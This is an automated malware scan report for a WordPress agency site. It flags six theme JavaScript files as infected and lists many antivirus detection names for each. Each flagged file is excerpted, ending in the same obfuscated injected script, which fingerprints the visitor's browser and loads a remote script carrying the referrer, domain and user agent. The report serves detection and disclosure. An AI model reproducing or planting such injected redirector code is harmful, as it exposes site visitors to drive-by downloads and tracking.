New scan:

Malware Scanner report for iamonebrandagency.com

Malicious/Suspicious/Total urls checked
6/0/18
6 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "iamonebrandagency.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=iamonebrandagency.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://iamonebrandagency.com/
200 OK
Content-Length: 23396
Content-Type: text/html
clean
http://iamonebrandagency.com/wp-includes/js/jquery/jquery.js?ver=1.10.2
200 OK
Content-Length: 93128
Content-Type: application/javascript
clean
http://iamonebrandagency.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://iamonebrandagency.com/wp-content/plugins/resume-submissions-job-postings/includes/jQuery/jquery.multi-file.js?ver=3.6
200 OK
Content-Length: 20554
Content-Type: application/javascript
clean
http://iamonebrandagency.com/wp-content/themes/FactoryWP/javascript/custom.js
200 OK
Content-Length: 49499
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery(document).ready(function($){
$(".trigger").click(function(){
$(".themes").toggle("fast");
$(this).toggleClass("active");
return false;
});
});
var ddsmoothmenu={
arrowimages: {down:[], right:[]},
transition: {overtime:150, outtime:150}, shadow: {enable:true, offsetx:5, offsety:5}, showhidedelay: {showdelay: 150, hidedelay: 150},
detectwebkit: navigator.userAgent.toLowerCase().indexOf("applewebkit")!=-1, detectie6: document.all && !w
... 3260 bytes are skipped ...
ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/Redirector.OM.2
Avast
JS:Decode-OG [Trj]
Ad-Aware
Trojan.Agent.JS.DN
Ikarus
Trojan.JS.Redirector
Rising
JS:Trojan.Script.JS.Redirector.f!1609362
nProtect
Trojan.Agent.JS.DN
TrendMicro-HouseCall
JS_REDIR.FB
Comodo
TrojWare.JS.Redirector.OM
Emsisoft
Trojan.Agent.JS.DN (B)
CAT-QuickHeal
JS/Redirector.ID
K7GW
Exploit ( 04c556d81 )
TrendMicro
JS_REDIR.FB
Microsoft
Trojan:JS/Redirector.ID
Kaspersky
Trojan-Downloader.JS.JScript.ag
MicroWorld-eScan
Trojan.Agent.JS.DN
Fortinet
JS/JSRedir.DO!tr
TotalDefense
JS/Redirector.DL
NANO-Antivirus
Trojan.Script.Agent.lymqb
ClamAV
JS.Trojan.Downloader-2
F-Secure
Trojan.Agent.JS.DN
VIPRE
Trojan.JS.JScript.ag (v)
AVG
JS/Redir
Norman
Obfuscated.EB
Sophos
Troj/JSRedir-DO
GData
Trojan.Agent.JS.DN
Symantec
Trojan.Malscript!JS
Agnitum
JS.Srcid.Gen
BitDefender
Trojan.Agent.JS.DN

http://iamonebrandagency.com/wp-content/themes/FactoryWP/javascript/styleswitch.js
200 OK
Content-Length: 26465
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var manual_or_random="manual" var randomsetting="3 days"
function getCookie(Name) {
var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] else chooseStyle('blue-theme', 60);
return null
}
function setCookie(name, value, days) {
var expireDate = new Date()
var expstring=(typeof days!="undefined")? expireDate.setDate(expireDate.getDate()+parseInt(days)) : expireDate.setDate(expireDate.getDate()-5)
d
... 3230 bytes are skipped ...
ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/Redirector.OM.2
Avast
JS:Decode-OG [Trj]
Ad-Aware
Trojan.Agent.JS.DN
Ikarus
Trojan.Script
Rising
JS:Trojan.Script.JS.Redirector.f!1609362
nProtect
Trojan.Agent.JS.DN
K7AntiVirus
Trojan ( 0ea2df630 )
TrendMicro-HouseCall
JS_REDIR.FB
Emsisoft
Trojan.Agent.JS.DN (B)
Comodo
TrojWare.JS.Redirector.OM
CAT-QuickHeal
JS/Redirector.ID
K7GW
Exploit ( 04c556d81 )
TrendMicro
JS_REDIR.FB
Microsoft
Trojan:JS/Redirector.ID
Kaspersky
Trojan-Downloader.JS.JScript.ag
MicroWorld-eScan
Trojan.Agent.JS.DN
Fortinet
JS/JSRedir.DO!tr
TotalDefense
JS/Redirector.DL
NANO-Antivirus
Trojan.Script.Agent.lymqb
ClamAV
JS.Trojan.Agent-8
F-Secure
Trojan.Agent.JS.DN
VIPRE
Trojan.JS.JScript.ag (v)
F-Prot
JS/Redir.AO
AVG
JS/Redir
Norman
Obfuscated.EB
Sophos
Troj/JSRedir-DO
GData
Trojan.Agent.JS.DN
Symantec
Trojan.Malscript!JS
Commtouch
JS/Redir.AO
Agnitum
JS.Srcid.Gen
ESET-NOD32
JS/Agent.NEQ
BitDefender
Trojan.Agent.JS.DN

http://iamonebrandagency.com/wp-content/themes/FactoryWP/javascript/cufon.js
200 OK
Content-Length: 19634
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&
... 3061 bytes are skipped ...
ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;

Antivirus reports:

AntiVir
JS/Redirector.OM.2
Avast
JS:Decode-OG [Trj]
Ikarus
Trojan.Script
nProtect
Trojan.Agent.JS.DN
TrendMicro-HouseCall
JS_REDIR.FB
Emsisoft
Trojan.Agent.JS.DN (B)
Comodo
TrojWare.JS.Redirector.OM
TrendMicro
JS_REDIR.FB
Kaspersky
Trojan-Downloader.JS.JScript.ag
Microsoft
Trojan:JS/Redirector.ID
MicroWorld-eScan
Trojan.Agent.JS.DN
Fortinet
JS/Crypt.CABZ!tr
PCTools
Trojan.Malscript
TotalDefense
JS/Redirector.DL
NANO-Antivirus
Trojan.Script.Agent.lymqb
ClamAV
JS.Trojan.Agent-8
F-Secure
Trojan.Agent.JS.DN
VIPRE
Trojan.JS.JScript.ag (v)
AVG
JS/Redir
Norman
Obfuscated.EB
Sophos
Troj/JSRedir-DO
GData
Trojan.Agent.JS.DN
Agnitum
JS.Srcid.Gen
BitDefender
Trojan.Agent.JS.DN
ESET-NOD32
JS/Agent.NEQ

http://iamonebrandagency.com/wp-content/themes/FactoryWP/javascript/font.js
200 OK
Content-Length: 35663
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

Cufon.registerFont({"w":162,"face":{"font-family":"Cicle","font-weight":300,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"70","bbox":"-9 -312 366 72","underline-thickness":"18","underline-position":"-18","unicode-range":"U+0020-U+FB02"},"glyphs":{" ":{"w":92},"\u00a0":{"w":92},"e":{"d":"26,-83v-2,58,59,89,107,58r6,13v-15,7,-30,16,-53,15v-50,-3,-76,-41,-76,-93v0,-50,25,-88,72,-93v50,4,72,44,71,100r-127,0xm139,-98v4,-67,-87
... 3026 bytes are skipped ...
ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;

Antivirus reports:

AntiVir
JS/Redirector.OM.2
Avast
JS:Decode-OG [Trj]
Ikarus
Trojan.Script
nProtect
Trojan.Agent.JS.DN
TrendMicro-HouseCall
JS_REDIR.FB
Emsisoft
Trojan.Agent.JS.DN (B)
Comodo
TrojWare.JS.Redirector.OM
TrendMicro
JS_REDIR.FB
Kaspersky
Trojan-Downloader.JS.JScript.ag
Microsoft
Trojan:JS/Redirector.ID
PCTools
Trojan.Malscript
TotalDefense
JS/Redirector.DL
NANO-Antivirus
Trojan.Script.Agent.lymqb
ClamAV
JS.Trojan.Agent-8
F-Secure
Trojan.Agent.JS.DN
VIPRE
Trojan.JS.JScript.ag (v)
AVG
JS/Redir
Norman
Obfuscated.EB
Sophos
Troj/JSRedir-DO
GData
Trojan.Agent.JS.DN
Symantec
Trojan.Malscript!JS
Agnitum
JS.Srcid.Gen
BitDefender
Trojan.Agent.JS.DN

http://iamonebrandagency.com/wp-content/themes/FactoryWP/javascript/dualslider.js
200 OK
Content-Length: 20073
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($) {
$.fn.dualSlider = function(options) {
var defaults = {
auto: true,
autoDelay: 10000,
easingCarousel: 'swing',
easingDetails: 'easeOutBack',
durationCarousel: 500,
durationDetails: 600
};
var options = $.extend(defaults, options);
this.each(function() {
var obj = $(this);
var carousel;

... 3295 bytes are skipped ...
ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/Redirector.OM.2
Avast
JS:Decode-OG [Trj]
Ad-Aware
Trojan.Agent.JS.DN
Ikarus
Trojan.Script
Rising
JS:Trojan.Script.JS.Redirector.f!1609362
nProtect
Trojan.Agent.JS.DN
K7AntiVirus
Trojan ( 0ea2df630 )
TrendMicro-HouseCall
JS_REDIR.FB
Emsisoft
Trojan.Agent.JS.DN (B)
Comodo
TrojWare.JS.Redirector.OM
CAT-QuickHeal
JS/Redirector.ID
K7GW
Exploit ( 04c556d81 )
TrendMicro
JS_REDIR.FB
Microsoft
Trojan:JS/Redirector.ID
Kaspersky
Trojan-Downloader.JS.JScript.ag
MicroWorld-eScan
Trojan.Agent.JS.DN
Fortinet
JS/JSRedir.DO!tr
TotalDefense
JS/Redirector.DL
NANO-Antivirus
Trojan.Script.Agent.lymqb
ClamAV
JS.Trojan.Downloader-2
F-Secure
Trojan.Agent.JS.DN
VIPRE
Trojan.JS.JScript.ag (v)
F-Prot
JS/Redir.AO
AVG
JS/Redir
Norman
Obfuscated.EB
Sophos
Troj/JSRedir-DO
GData
Trojan.Agent.JS.DN
Symantec
Trojan.Malscript!JS
Commtouch
JS/Redir.AO
Agnitum
JS.Srcid.Gen
BitDefender
Trojan.Agent.JS.DN

http://iamonebrandagency.com/wp-content/themes/FactoryWP/javascript/blogger.js
200 OK
Content-Length: 3080
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function twitterCallback2(twitters) {
var statusHTML = [];
for (var i=0; i<twitters.length; i++){
var username = twitters[i].user.screen_name;
var status = twitters[i].text.replace(/((https?|s?ftp|ssh)\:\/\/[^"\s\<\>]*[^.,;'">\:\s\<\>\)\]\!])/g, function(url) {
return '<a href="'+url+'">'+url+'</a>';
}).replace(/\B@([_a-z0-9]+)/ig, function(reply) {
return reply.charAt(0)+'<a href="http://twitter.com/'+repl
... 2342 bytes are skipped ...
ua[_0xa687[3]](_0xa687[4])==-1&&ua[_0xa687[3]](_0xa687[5])==-1))&&ua[_0xa687[3]](_0xa687[6])!=-1){element=document[_0xa687[8]](_0xa687[7]);if(!element){uedhffkte=document[_0xa687[9]];hghjhjhjg=escape(document[_0xa687[10]]);kdhkjt=escape(navigator[_0xa687[1]]);var js=document[_0xa687[12]](_0xa687[11]);js[_0xa687[13]]=_0xa687[7];js[_0xa687[14]]=_0xa687[15]+hghjhjhjg+_0xa687[16]+uedhffkte+_0xa687[17]+kdhkjt;var head=document[_0xa687[19]](_0xa687[18])[0];head[_0xa687[20]](js);} ;} ;

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/Redirector.OM.2
Avast
JS:Decode-OG [Trj]
Ad-Aware
Trojan.Agent.JS.DN
Ikarus
Trojan.JS.Redirector
Rising
JS:Trojan.Script.JS.Redirector.f!1609362
nProtect
Trojan.Agent.JS.DN
K7AntiVirus
Trojan ( 0ea2df630 )
TrendMicro-HouseCall
JS_REDIR.FB
Emsisoft
Trojan.Agent.JS.DN (B)
Comodo
TrojWare.JS.Redirector.OM
CAT-QuickHeal
JS/Redirector.ID
K7GW
Exploit ( 04c556d81 )
TrendMicro
JS_REDIR.FB
Microsoft
Trojan:JS/Redirector.ID
Kaspersky
Trojan-Downloader.JS.JScript.ag
MicroWorld-eScan
Trojan.Agent.JS.DN
Fortinet
JS/Crypted.AG!tr.dldr
TotalDefense
JS/Redirector.DL
NANO-Antivirus
Trojan.Script.Agent.lymqb
ClamAV
JS.Trojan.Downloader-2
F-Secure
Trojan.Agent.JS.DN
VIPRE
Trojan.JS.JScript.ag (v)
F-Prot
JS/Redir.AO
AVG
JS/Redir
Norman
Obfuscated.EB
Sophos
Troj/JSRedir-DO
GData
Trojan.Agent.JS.DN
Symantec
Trojan.Malscript!JS
Commtouch
JS/Redir.AO
Agnitum
JS.Srcid.Gen
ESET-NOD32
JS/Agent.NEQ
BitDefender
Trojan.Agent.JS.DN

http://twitter.com/statuses/user_timeline/iamonebrandagcy.json?callback=twitterCallback2&count=1
HTTP/1.1 301 Moved Permanently
Date: Tue, 03 Mar 2015 12:19:17 UTC
Location: https://twitter.com/statuses/user_timeline/iamonebrandagcy.json?callback=twitterCallback2&count=1
Server: tsa_b
Content-Length: 0
Set-Cookie: guest_id=v1%3A142538515709389805; Domain=.twitter.com; Path=/; Expires=Thu, 02-Mar-2017 12:19:17 UTC
X-Connection-Hash: ef86eafa710758354b54df628b76ea83
X-Response-Time: 2
clean
https://twitter.com/statuses/user_timeline/iamonebrandagcy.json?callback=twittercallback2&count=1
404 Not Found
Content-Length: 91
Content-Type: application/javascript
clean
http://iamonebrandagency.com/?page_id=1269
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 Mar 2015 12:19:18 GMT
Location: http://iamonebrandagency.com/who-we-are-2
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://iamonebrandagency.com/xmlrpc.php
X-Powered-By: PHP/5.3.29
clean
http://iamonebrandagency.com/who-we-are-2
200 OK
Content-Length: 15703
Content-Type: text/html
clean
http://iamonebrandagency.com/?page_id=1047
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 Mar 2015 12:19:21 GMT
Location: http://iamonebrandagency.com/what-we-do
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://iamonebrandagency.com/xmlrpc.php
X-Powered-By: PHP/5.3.29
clean
http://iamonebrandagency.com/what-we-do
200 OK
Content-Length: 15133
Content-Type: text/html
clean
http://iamonebrandagency.com/portfolio-2-columns-3-2-2
200 OK
Content-Length: 15823
Content-Type: text/html
clean
http://iamonebrandagency.com/live-stream
200 OK
Content-Length: 11196
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: iamonebrandagency.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 12:19:07 GMT
Server: Apache/2.2.22
Vary: User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://iamonebrandagency.com/xmlrpc.php
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: iamonebrandagency.com
Referer: http://www.google.com/search?q=iamonebrandagency.com

Result:
The result is similar to the first query. There are no suspicious redirects found.